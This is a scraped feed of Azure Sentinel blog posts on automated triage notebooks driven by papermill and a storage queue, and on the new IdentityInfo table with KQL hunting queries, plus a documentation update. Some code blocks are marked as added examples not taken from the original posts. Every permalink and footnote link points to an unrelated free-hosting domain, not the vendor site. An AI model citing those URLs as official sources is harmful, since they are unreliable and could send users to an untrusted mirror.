From here you can add a new Queue.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="17.png" style="width: 505px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298452iA91C7D807C732266/image-size/large?v=v2&amp;px=999" role="button" title="17.png" alt="17.png" /></span></P> <P>&nbsp;</P> <P>Once the Queue is created you will need to add the Queue name and the Storage Account name to the “AutomatedNotebooks-Manager.ipynb” notebook, in the same cell that the other variables were added to. In addition, you will need to update the Managed Identity assigned to the Azure VM to add the <EM>Storage Queue Data Reader</EM> role scoped to the storage account where the Queue is deployed. More details on this role can be <A href="#" target="_blank" rel="noopener">found here</A>.</P> <H4>&nbsp;</H4> <H4>Configure Notebook to use Storage Queue</H4> <P>The “AutomatedNotebooks-Manager.ipynb” notebook contains the code to enable the collection of Incidents from the Queue, but it is commented out by default. To use the queue method, uncomment that code and comment out or delete the cell above it that gets all incidents via the Azure Sentinel API.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="18.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298453iE6BE663313F479F6/image-size/large?v=v2&amp;px=999" role="button" title="18.png" alt="18.png" /></span></P> <H4>&nbsp;</H4> <H4>Configure Incidents to Trigger Notebooks</H4> <P>Once the queue is created you can filter the incidents from Azure Sentinel that you wish to be added to the queue and thus processed by the automated notebooks. This is done with Azure Sentinel Automation Playbooks. 
For details on creating Playbooks please refer to <A href="#" target="_blank" rel="noopener">this documentation</A>.</P> <P>The required playbook needs only two steps:</P> <OL> <LI>When Azure Sentinel incident creation rule was triggered (Preview)</LI> <LI>Put a message on a queue: <OL> <LI>The <STRONG>Queue Name</STRONG> value should be set to the name of the Queue you created previously.</LI> <LI>The <STRONG>Message </STRONG>should be set to the <STRONG>Incident ARM ID</STRONG> dynamic property.</LI> </OL> </LI> </OL> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="19.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298454iFF0CAF93AEBEBE87/image-size/large?v=v2&amp;px=999" role="button" title="19.png" alt="19.png" /></span></P> <P>Once the playbook is created, choose which analytics rules you want auto-triaged and configure these to trigger this playbook when an incident is created. Details on how to configure this can be <A href="#" target="_blank" rel="noopener">found here</A>. This will then write the incident ID to the queue so that it will be picked up by the “AutomatedNotebooks-Manager.ipynb” notebook.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="20.png" style="width: 478px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298455i5BE10646295D7329/image-size/large?v=v2&amp;px=999" role="button" title="20.png" alt="20.png" /></span></P> <P>&nbsp;</P> <P>Once this step is complete and the playbook is attached to one or more analytics rules, the solution is configured. The next time a matching incident is created, the automated notebook solution will trigger.</P> <P>&nbsp;</P> <H2>Using the notebooks during incident triage</H2> <P>Once the automated notebooks are configured you will start to see triaged incidents appearing in your Azure Sentinel instance. 
You can identify triaged incidents by the presence of a comment in the incident with a link to a notebook:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="21.png" style="width: 271px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298456iA200D68F49B9859C/image-size/large?v=v2&amp;px=999" role="button" title="21.png" alt="21.png" /></span></P> <P>To access the completed triage notebook simply click the link in the comment and you will be directed to Azure ML.</P> <P>Note: analysts who need to access the triage notebooks will need access to the Azure ML workspace configured in this process.</P> <P>Azure ML will open the triage notebook automatically. The analyst can then browse the contents of the notebook without needing to interact with it; they can simply scroll down to see the output:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="22.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298457iE16F3149D05E7CB0/image-size/large?v=v2&amp;px=999" role="button" title="22.png" alt="22.png" /></span></P> <P>Notebooks from other incidents are also accessible via the navigation pane on the left hand side of the Azure ML interface. Each notebook is stored with the name of the incident GUID it relates to.</P> <P>&nbsp;</P> <P>The AutomatedNotebooks-IncidentTriage.ipynb and AutomatedNotebooks-Manager.ipynb notebooks can also be modified to include additional triage steps or update actions as required. By default the process enriches entities attached to the incident and only updates the incident severity; however, it is possible to perform triage on other elements of the incident and update additional elements automatically. 
See <A href="#" target="_blank" rel="noopener">MSTICpy</A> for details of functions and features that could easily be added to these notebooks.</P> <H2>&nbsp;</H2> <H2>Troubleshooting</H2> <P>During execution of the “AutomatedNotebooks-Manager.ipynb” notebook a log of activity is written to the file “notebook_execution.log” in the same folder as AutomatedNotebooks-Manager.ipynb. This provides details of execution flow and which incidents were processed, so it should be the first thing you check when troubleshooting.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="23.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298458i4124C91FDF212E54/image-size/large?v=v2&amp;px=999" role="button" title="23.png" alt="23.png" /></span></P> <P>If not using the Queue method for incident triggers, the most likely cause of issues is with the notebooks themselves. The easiest way to troubleshoot these is to run them individually and inspect the output. To trigger the “AutomatedNotebooks-Manager.ipynb” notebook you can invoke it manually using Papermill via the CLI with the following command:</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="bash">papermill "AutomatedNotebooks-Manager.ipynb" -</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>You will see the notebook output in the terminal to allow you to debug it; alternatively, replace the `-` in the command with a file name to write the output to the file specified.</P> <P>If this notebook executes as expected, then you can also check the incident triage notebook itself. To do this select an incident in your Azure Sentinel workspace that has some entities attached and get the incident ID. This can be found in the incident view of the Sentinel portal as part of the Incident link. 
(The ID required is the GUID at the end of the full link text).</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="24.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298459iD318D7BBB2C90CA2/image-size/large?v=v2&amp;px=999" role="button" title="24.png" alt="24.png" /></span></P> <P>From there you can trigger that notebook from the CLI with:</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="bash">papermill "AutomatedNotebooks-IncidentTriage.ipynb" debug.ipynb -p incident_id "&lt;INCIDENT ID&gt;" -p ws_id "&lt;YOUR WORKSPACE ID&gt;" -p ten_id "&lt;YOUR TENANT ID&gt;"</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>This will run the triage notebook with the Incident ID provided and will write the resulting notebook to a file called `debug.ipynb`. This file is a complete copy of the original notebook but with all of the execution results (including any errors). You can open the debug file in Azure ML or another Jupyter notebook environment to check for any execution issues. You can view the file as raw text, but the native JSON format makes it difficult to read. You can also convert the notebook to an HTML document using the <A href="#" target="_blank" rel="noopener">nbconvert</A> tool.</P> <P>&nbsp;</P> <P>If you are using the Queue method, you will also want to ensure items are being properly passed to the Queue. This is easily done by browsing to the Queue resource in the Azure Portal. 
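</P> <P>The queue item the playbook writes is the full Incident ARM ID, while the triage notebook's incident_id parameter wants only the GUID at its end. The following added example (not code from the Azure-Sentinel-Notebooks project) shows the Manager-side step that validates a queue message, extracts the GUID and other path components, applies a selection criterion, and builds the same papermill invocation used above for debugging, as an argument list rather than a shell string so the values are never shell-interpreted. The queue message, workspace ID and tenant ID are constructed placeholders; the runs/ output folder and the "same workspace as configured" criterion are assumptions made for this example.</P>

```python
"""Queue-driven manager helpers: Incident ARM ID -> incident GUID -> papermill call.

Added example, not the project's notebook code. Sample values are constructed.
"""
import re
import subprocess
from dataclasses import dataclass
from typing import List

# Shape of an incident ARM ID (the playbook's "Incident ARM ID" dynamic property):
# /subscriptions/<sub>/resourceGroups/<rg>/providers/Microsoft.OperationalInsights
#   /workspaces/<ws>/providers/Microsoft.SecurityInsights/Incidents/<guid>
_GUID = r"[0-9a-fA-F]{8}-(?:[0-9a-fA-F]{4}-){3}[0-9a-fA-F]{12}"
_INCIDENT_ARM_ID = re.compile(
    r"^/subscriptions/(?P<subscription>" + _GUID + r")"
    r"/resourceGroups/(?P<resource_group>[^/]+)"
    r"/providers/Microsoft\.OperationalInsights/workspaces/(?P<workspace>[^/]+)"
    r"/providers/Microsoft\.SecurityInsights/Incidents/(?P<incident>" + _GUID + r")$",
    re.IGNORECASE,
)

# Constructed sample queue message in the same shape as a real incident ARM ID.
SAMPLE_QUEUE_MESSAGE = (
    "/subscriptions/11111111-2222-3333-4444-555555555555"
    "/resourceGroups/Sentinel/providers/Microsoft.OperationalInsights"
    "/workspaces/sentinelworkspace/providers/Microsoft.SecurityInsights"
    "/Incidents/AAAAAAAA-BBBB-CCCC-DDDD-EEEEEEEEEEEE"
)


@dataclass(frozen=True)
class IncidentRef:
    subscription: str
    resource_group: str
    workspace: str
    incident_id: str


def parse_incident_arm_id(message: str) -> IncidentRef:
    """Validate a queue message and split it into its parts.

    Accepting only an exact incident ARM ID means a stray or malformed queue item
    can never reach papermill as a parameter value.
    """
    match = _INCIDENT_ARM_ID.match(message.strip())
    if match is None:
        raise ValueError(f"not an Azure Sentinel incident ARM ID: {message!r}")
    return IncidentRef(
        subscription=match["subscription"].lower(),
        resource_group=match["resource_group"],
        workspace=match["workspace"],
        incident_id=match["incident"].lower(),
    )


def should_triage(ref: IncidentRef, configured_workspace: str) -> bool:
    """Selection criterion (assumed): only triage incidents from the configured workspace."""
    return ref.workspace.lower() == configured_workspace.lower()


def triage_command(ref: IncidentRef, ws_id: str, ten_id: str,
                   out_dir: str = "runs") -> List[str]:
    """Build the papermill argv for one incident; the output notebook is named after the GUID."""
    return [
        "papermill",
        "AutomatedNotebooks-IncidentTriage.ipynb",
        f"{out_dir}/{ref.incident_id}.ipynb",
        "-p", "incident_id", ref.incident_id,
        "-p", "ws_id", ws_id,
        "-p", "ten_id", ten_id,
    ]


def run_triage(ref: IncidentRef, ws_id: str, ten_id: str) -> int:
    """Execute the triage notebook; returns papermill's exit code (non-zero if the notebook errored)."""
    return subprocess.run(triage_command(ref, ws_id, ten_id), check=False).returncode


if __name__ == "__main__":
    ref = parse_incident_arm_id(SAMPLE_QUEUE_MESSAGE)
    if should_triage(ref, "sentinelworkspace"):
        print(" ".join(triage_command(ref, "<YOUR WORKSPACE ID>", "<YOUR TENANT ID>")))
```

<P>A non-zero return from run_triage, or a ValueError from parse_incident_arm_id, is worth logging to notebook_execution.log alongside the raw message, since those are exactly the cases the Troubleshooting steps above are meant to surface.</P> <P>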
If functioning correctly and the attached incidents have occurred, then the queue should contain full incident links that should appear in the same format as: /subscriptions/796fca0e-7703-476a-9d66-a65d3a7825dd/resourceGroups/Sentinel/providers/Microsoft.OperationalInsights/workspaces/sentinelworkspace/providers/Microsoft.SecurityInsights/Incidents/f9e57a1f-8d1a-4efa-a165-4a48c2b2c46e.</P> <P>&nbsp;</P> <P>Should you encounter issues with this solution please raise an Issue on the <A href="#" target="_self">Azure-Sentinel-Notebooks GitHub repo</A>.</P> <P>&nbsp;</P> <H2>Summary</H2> <P>In this blog we have seen how it is possible to use open source software and Azure services to easily automate the process of executing Jupyter Notebooks linked to Azure Sentinel. This approach can vastly improve the efficiency and effectiveness of SOC operations, as well as forming the core of a software defined monitoring approach. Whilst in this blog we have shown how this process can be used for triaging incidents and supporting first line SOC operations, the same pattern could be applied to virtually any security monitoring scenario that involves the repetition of a set of analytical steps, whether it be enrichment of datasets, custom analytics using Python specific features, or threat intelligence processing.&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P><A href="https://gorovian.000webhostapp.com/?exam=#_ednref1" target="_blank" rel="noopener" name="_edn1"><SPAN>[i]</SPAN></A> This should be the same KeyVault you set up as a pre-requisite to this solution.</P> <P><A href="https://gorovian.000webhostapp.com/?exam=#_ednref1" target="_blank" rel="noopener" name="_edn1"><SPAN>[i]</SPAN></A> VSCode is recommended for this.</P> Fri, 06 Aug 2021 20:03:28 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/software-defined-monitoring-using-automated-notebooks-and-azure/ba-p/2587775 Pete Bryan 2021-08-06T20:03:28Z What's new: IdentityInfo table is now in public preview! 
https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-identityinfo-table-is-now-in-public-preview/ba-p/2571037 <P>Hey everyone!</P> <P>&nbsp;</P> <P>Having the right information during an investigation is crucial to differentiating between FP and TP, and to starting the ‘Scope of Breach’ process on time, since every second counts.</P> <P>&nbsp;</P> <P>The attack surface used by hackers is often the company’s user and service accounts, so the information about those accounts – who is the user behind them, what are their privileges, and additional data – is important for the analyst to have while investigating those entities.</P> <P>&nbsp;</P> <P>Furthermore, embedding entity information in your analytics rules will result in ‘tailor-made’ analytics for your organization that fit your use cases and scenarios and can reduce FP.</P> <P>&nbsp;</P> <P><FONT size="6">How Do I Start?</FONT></P> <P>&nbsp;</P> <P>If you haven’t enabled UEBA – we encourage you to do so! It’s so <A href="#" target="_blank" rel="noopener">simple</A>.</P> <P>&nbsp;</P> <P>Part of the process of enabling UEBA is providing consent for Sentinel UEBA to synchronize your Azure Active Directory. 
This allows us to create profiles for user accounts in the organization.</P> <P>&nbsp;</P> <P>If you already have UEBA enabled, you will notice that a new table called ‘IdentityInfo’ is now available under the ‘Azure Sentinel UEBA’ group in LA.</P> <P>&nbsp;</P> <LI-SPOILER> <P>The IdentityInfo table contains a snapshot of the user’s profile: metadata information, group membership, Azure AD roles assigned and UEBA enrichments.</P> </LI-SPOILER> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="image.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/297590i0E20CDBB8499FD8E/image-size/large?v=v2&amp;px=999" role="button" title="image.png" alt="IdentityInfo table in the Logs blade" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">IdentityInfo table in the Logs blade</span></span></P> <P>&nbsp;</P> <P><FONT size="6">&nbsp;Important information:</FONT></P> <UL> <LI>Once UEBA is enabled, we will sync all your AAD users into the ‘IdentityInfo’ table</LI> <LI>Default retention time for the table is 30 days</LI> <LI>After the initial sync, any changes made in AAD to your users will be saved in LA within 15 minutes.</LI> <LI>Groups &amp; Roles are updated on a daily basis</LI> <LI>Every 21 days we will resync your entire AAD directory, to make sure stale records are updated.</LI> <LI>Note: <UL> <LI>Deleted group memberships (a user removed from a group) are not supported yet. 
The group will still be listed in the user’s group membership.</LI> <LI>We only support Azure Active Directory built-in roles for the assigned roles attribute.</LI> <LI>The initial sync might take a few days (depending on the size of the tenant).</LI> </UL> </LI> </UL> <P>&nbsp;</P> <P><FONT size="6">What information can I find there?</FONT></P> <P>&nbsp;</P> <P>The IdentityInfo table contains the following information taken from your Azure Active Directory:</P> <P>&nbsp;</P> <TABLE width="100%"> <THEAD> <TR> <TD width="19%"> <P><STRONG>Column</STRONG></P> </TD> <TD width="5%"> <P><STRONG>Type</STRONG></P> </TD> <TD width="74%"> <P><STRONG>Description</STRONG></P> </TD> </TR> </THEAD> <TBODY> <TR> <TD width="19%"> <P>AccountCloudSID</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>The Azure AD security identifier of the account</P> </TD> </TR> <TR> <TD width="19%"> <P>AccountCreationTime</P> </TD> <TD width="5%"> <P>datetime</P> </TD> <TD width="74%"> <P>The date the user account was created (UTC)</P> </TD> </TR> <TR> <TD width="19%"> <P>AccountDisplayName</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>The user account display name</P> </TD> </TR> <TR> <TD width="19%"> <P>AccountDomain</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>Domain name of the user account</P> </TD> </TR> <TR> <TD width="19%"> <P>AccountName</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>User name of the account</P> </TD> </TR> <TR> <TD width="19%"> <P>AccountObjectId</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>The Azure Active Directory object ID for the account</P> </TD> </TR> <TR> <TD width="19%"> <P>AccountSID</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>The on-premises security identifier of the account</P> </TD> </TR> <TR> <TD width="19%"> <P>AccountTenantId</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>The Azure Active Directory Tenant ID of the 
account</P> </TD> </TR> <TR> <TD width="19%"> <P>AccountUPN</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>User principal name of the account</P> </TD> </TR> <TR> <TD width="19%"> <P>AdditionalMailAddresses</P> </TD> <TD width="5%"> <P>dynamic</P> </TD> <TD width="74%"> <P>Additional email addresses of the user</P> </TD> </TR> <TR> <TD width="19%"> <P>AssignedRoles</P> </TD> <TD width="5%"> <P>dynamic</P> </TD> <TD width="74%"> <P>AAD roles the user account is assigned to</P> </TD> </TR> <TR> <TD width="19%"> <P>City</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>The city of the user account as defined in AAD</P> </TD> </TR> <TR> <TD width="19%"> <P>Country</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>The country of the user account as defined in AAD</P> </TD> </TR> <TR> <TD width="19%"> <P>DeletedDateTime</P> </TD> <TD width="5%"> <P>datetime</P> </TD> <TD width="74%"> <P>The date and time the user was deleted</P> </TD> </TR> <TR> <TD width="19%"> <P>Department</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>The user account department as defined in AAD</P> </TD> </TR> <TR> <TD width="19%"> <P>GivenName</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>The user account given name</P> </TD> </TR> <TR> <TD width="19%"> <P>GroupMembership</P> </TD> <TD width="5%"> <P>dynamic</P> </TD> <TD width="74%"> <P>Azure AD Groups the user account is a member of</P> </TD> </TR> <TR> <TD width="19%"> <P>IsAccountEnabled</P> </TD> <TD width="5%"> <P>bool</P> </TD> <TD width="74%"> <P>Indication if the account is enabled in AAD or not</P> </TD> </TR> <TR> <TD width="19%"> <P>JobTitle</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>The user account job title as defined in AAD</P> </TD> </TR> <TR> <TD width="19%"> <P>MailAddress</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>The user account primary email address</P> </TD> </TR> <TR> <TD width="19%"> 
<P>Manager</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>The user account's manager alias</P> </TD> </TR> <TR> <TD width="19%"> <P>OnPremisesDistinguishedName</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>Active Directory distinguished name (DN). A DN is a sequence of relative distinguished names (RDN) connected by commas.</P> </TD> </TR> <TR> <TD width="19%"> <P>Phone</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>The phone number of the user account as defined in AAD</P> </TD> </TR> <TR> <TD width="19%"> <P>SourceSystem</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%">&nbsp;</TD> </TR> <TR> <TD width="19%"> <P>State</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>The geographical state of the user account as defined in AAD</P> </TD> </TR> <TR> <TD width="19%"> <P>StreetAddress</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>The office street address of the user account as defined in AAD</P> </TD> </TR> <TR> <TD width="19%"> <P>Surname</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>The user account surname</P> </TD> </TR> <TR> <TD width="19%"> <P>TenantId</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%">&nbsp;</TD> </TR> <TR> <TD width="19%"> <P>TimeGenerated</P> </TD> <TD width="5%"> <P>datetime</P> </TD> <TD width="74%"> <P>Time when the event was generated (UTC)</P> </TD> </TR> <TR> <TD width="19%"> <P>Type</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>The name of the table</P> </TD> </TR> <TR> <TD width="19%"> <P>UserType</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>The user type as it appears in Azure AD</P> </TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <P><FONT size="6">What’s in it for me?</FONT></P> <P>&nbsp;</P> <P>Having user information surfaced in Log Analytics allows you (as a SecOps analyst / Threat Hunter) to address various lines of investigation, for example:</P> <P>&nbsp;</P> 
<P><EM><STRONG>Which users are members of my "Executive" AAD security group?</STRONG></EM></P> <P>&nbsp;</P> <LI-CODE lang="applescript">// Latest snapshot per account, then filter on the dynamic GroupMembership column
IdentityInfo
| summarize arg_max(TimeGenerated, *) by AccountObjectId
| where GroupMembership contains "Executive"</LI-CODE> <P>&nbsp;</P> <P><EM><STRONG>Who are all my guest accounts in the tenant?</STRONG></EM></P> <P>&nbsp;</P> <LI-CODE lang="applescript">IdentityInfo
| summarize arg_max(TimeGenerated, *) by AccountObjectId
| where UserType == "Guest"</LI-CODE> <P>&nbsp;</P> <P><EM><STRONG>Which of my users are only AAD users (i.e. not synced from my on-prem AD)?</STRONG></EM></P> <P>&nbsp;</P> <LI-CODE lang="applescript">// Cloud-only accounts have no on-premises distinguished name
IdentityInfo
| summarize arg_max(TimeGenerated, *) by AccountObjectId
| where isempty(OnPremisesDistinguishedName)</LI-CODE> <P>&nbsp;</P> <P><EM><STRONG>Which users have assigned "privileged" Azure Active Directory roles?</STRONG></EM></P> <P>&nbsp;</P> <LI-CODE lang="applescript">let PrivilegedRoles = dynamic(["Global Administrator", "Security Administrator"]);
IdentityInfo
| summarize arg_max(TimeGenerated, *) by AccountObjectId
// AssignedRoles is a dynamic array; expand it to one row per role before matching
| mv-expand AssignedRoles
| where AssignedRoles in~ (PrivilegedRoles)
| summarize AssignedRoles = make_set(AssignedRoles)
    by AccountObjectId, AccountSID, AccountUPN, AccountDisplayName, JobTitle, Department</LI-CODE> <P>&nbsp;</P> <P>SecOps analysts can use this information to create their custom analytics rules:</P> <P>&nbsp;</P> <P><EM><STRONG>I want to be alerted if a specific server is accessed by anyone outside of the ‘Finance Department’.</STRONG></EM></P> <P>&nbsp;</P> <LI-CODE lang="applescript">// EventID is an integer column, so the list holds integers
let LoginEvent = dynamic([4624, 4768, 4776]);
SecurityEvent
| where EventID in (LoginEvent)
| where Computer == "Financesrv.contoso.com"
// Join the logon's target SID to the on-premises SID in the latest IdentityInfo snapshot
| join kind=innerunique (
    IdentityInfo
    | summarize arg_max(TimeGenerated, *) by AccountObjectId
) on $left.TargetUserSid == $right.AccountSID
| where Department != "Finance"</LI-CODE> 
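<P>As an added example (not from the original post), the finance-server rule above can be extended to suppress members of an approved exception group and to carry the IdentityInfo fields a ticketing playbook would attach to the ticket. The server name, department and group name are placeholders.</P>

```kusto
// Added example, not from the original post. Server, department and group names are placeholders.
let LoginEvents = dynamic([4624, 4768, 4776]);                       // EventID is an int column
let MonitoredServer = "Financesrv.contoso.com";                       // placeholder host
let AllowedDepartment = "Finance";
let ExceptionGroups = dynamic(["Finance-Server-Approved-Access"]);   // placeholder AAD group(s)
// Latest IdentityInfo snapshot per user; the table holds several records per account over time.
// TimeGenerated is dropped so it does not collide with the SecurityEvent column after the join.
let Identities = IdentityInfo
    | summarize arg_max(TimeGenerated, *) by AccountObjectId
    | project AccountSID, AccountUPN, AccountDisplayName, Department, JobTitle,
              Manager, AssignedRoles, GroupMembership, IsAccountEnabled;
SecurityEvent
| where EventID in (LoginEvents)
| where Computer =~ MonitoredServer
| join kind=innerunique (Identities) on $left.TargetUserSid == $right.AccountSID
| where Department != AllowedDepartment
// Suppress accounts that sit in an approved exception group.
// Caveat from the post: group removals are not yet reflected in IdentityInfo, so a user
// removed from the exception group stays suppressed until the next full resync.
| where not(tostring(GroupMembership) has_any (ExceptionGroups))
// Enrichment a playbook can copy straight into the ticket instead of looking the user up again.
| project TimeGenerated, Computer, EventID, LogonType, TargetUserName, AccountUPN,
          AccountDisplayName, Department, JobTitle, Manager, IsAccountEnabled, AssignedRoles
```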
<P>&nbsp;</P> <P>Taking the above example, you can extend it even further: if the user is a member of a specific group, don’t trigger an alert.</P> <P>&nbsp;</P> <P>In addition, when using automation to create a ticket in the ticketing system, pull information about the user from the ‘IdentityInfo’ table.</P> <P><STRONG>&nbsp;</STRONG></P> <P>You can read more about the IdentityInfo table and how to use it in our <A href="#" target="_self">docs</A>.</P> <P><STRONG>&nbsp;</STRONG></P> <P><FONT size="6">What’s next?</FONT></P> <P><STRONG>&nbsp;</STRONG></P> <P>Our goal is to expose to you, the Sentinel user, the information we have about the users in your organization. We’re going to constantly add more bits of information we learn about users (example below). In addition, we want to expand the entity profiles we have and surface those in Log Analytics as well (such as DeviceInfo, AppInfo, SecurityGroupInfo, IPaddressInfo…)</P> <P>&nbsp;</P> <P><STRONG>IdentityInfo table features to come:</STRONG></P> <UL> <LI>Applications</LI> <LI>Blast Radius</LI> <LI>EmployeeId</LI> <LI>Extension property from AAD</LI> <LI>Investigation priority – risk score</LI> <LI>Is MFA registered</LI> <LI>Last seen date</LI> <LI>On-prem extension property</LI> <LI>AAD IP risk level and state</LI> <LI>Related service principals</LI> <LI>Tags</LI> <LI>UACFlags</LI> <LI>UserState</LI> <LI>UserStateChangedOn</LI> </UL> <P>&nbsp;</P> <P>We Value Your Opinion!</P> <P>Our goal is to make your life easier while you investigate security incidents. If you have any feedback – about the experience, the usage – or anything else,</P> <P>Please let us know! 
We aim to improve.</P> <P>&nbsp;</P> Tue, 27 Jul 2021 11:26:53 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-identityinfo-table-is-now-in-public-preview/ba-p/2571037 Itay Argoety 2021-07-27T11:26:53Z What's New: Updated Azure Sentinel Documentation July Edition https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-updated-azure-sentinel-documentation-july-edition/ba-p/2587249 <P><EM>A big thank you to the Azure Sentinel CxE team for helping make this happen and a big thank you to Batami Gold for putting the documents together and organizing them.&nbsp; </EM></P> <P>&nbsp;</P> <P>A new effort has begun to create and upload content around commonly asked questions as well as best practices for using the product. With this, we have posted 3 new documents and updated some others that are live now!</P> <P>&nbsp;</P> <P><STRONG>New documents:</STRONG></P> <P data-unlink="true"><A href="#" target="_self">Pre-deployment best practices</A>:&nbsp;This document serves as a place to check while going through pre-deployment planning. 
It contains information about topics such as requirements, items to prioritize, and best practices for working with workspaces.</P> <P>&nbsp;</P> <P data-unlink="true"><A href="#" target="_self">General best practices</A>:&nbsp;This document covers general topics, such as tasks to perform and how often they should be performed, integrating Azure Sentinel with the other Microsoft security services, and incident response options.</P> <P>&nbsp;</P> <P data-unlink="true"><A href="#" target="_self">Data collection best practices:</A>&nbsp;This document covers topics to consider when collecting logs, whether it is through a built-in connector or a custom method.</P> <P data-unlink="true">&nbsp;</P> <P data-unlink="true">To avoid duplication of information and overly long documents, some best practices are found within the different feature documents for Azure Sentinel. Two examples would be <A href="#" target="_self">commonly used Azure Sentinel workbooks</A>&nbsp;and <A href="#" target="_self">cost and billing</A>. Both documents cover what is recommended and how to go about using the different features or methods within your Azure Sentinel environment. If you don't see something that you would expect, chances are that the item is covered under another document.</P> <P>&nbsp;</P> <P><STRONG>Updated content:</STRONG></P> <P>There are a few documents that have been updated with new content to cover newly developed concepts or questions that have been brought up. 
An example is the <A href="#" target="_self">costs and billing</A> document, which covers which data sources are free, which services generate cost when using Azure Sentinel, and options for cost management.&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="costsandbilling.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298377iCFB65BAFA6C8DD14/image-size/large?v=v2&amp;px=999" role="button" title="costsandbilling.gif" alt="costsandbilling.gif" /></span></P> <P>&nbsp;</P> <P><STRONG>Updated structure:&nbsp;</STRONG></P> <P>Along with the new content, the navigation pane has been updated as well to have a better flow and easier navigation. Before, documents were given scenario-based titles and were grouped under broad topics that mixed several features in the same bucket. With the update, documents are now broken into subtopics based on feature, with the use case listed within the title. As time goes on, new content and best practices can be found under the feature topics based on relevancy.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="docs.gif" style="width: 404px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298402i26B263D07746119B/image-size/large?v=v2&amp;px=999" role="button" title="docs.gif" alt="docs.gif" /></span></P> <P>&nbsp;</P> <P>As mentioned, as time goes on we will be adding more content and best practices to our documents, so please keep an eye on them! 
Go ahead and check out the new and updated content within the docs that are out today.</P> <P>&nbsp;</P> <P>If there are topics that are not covered or if you find content that is not helpful, not clear, or out of date, please let us know in the comments here so that we can get the content created!</P> Mon, 26 Jul 2021 18:16:09 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-updated-azure-sentinel-documentation-july-edition/ba-p/2587249 Matt_Lowe 2021-07-26T18:16:09Z Integrating SIEM + XDR: Azure Sentinel and Azure Defender bi-directional incident sync https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/integrating-siem-xdr-azure-sentinel-and-azure-defender-bi/ba-p/2587343 <P>To help defend against today’s evolving threats, SecOps teams need sophisticated tooling that provides both breadth of visibility across the entire enterprise and the depth needed to investigate threats.&nbsp; At Microsoft, we have a unique vision for the future of threat protection. While other vendors offer only a SIEM or XDR, Microsoft’s perspective is that SecOps can benefit from both. 
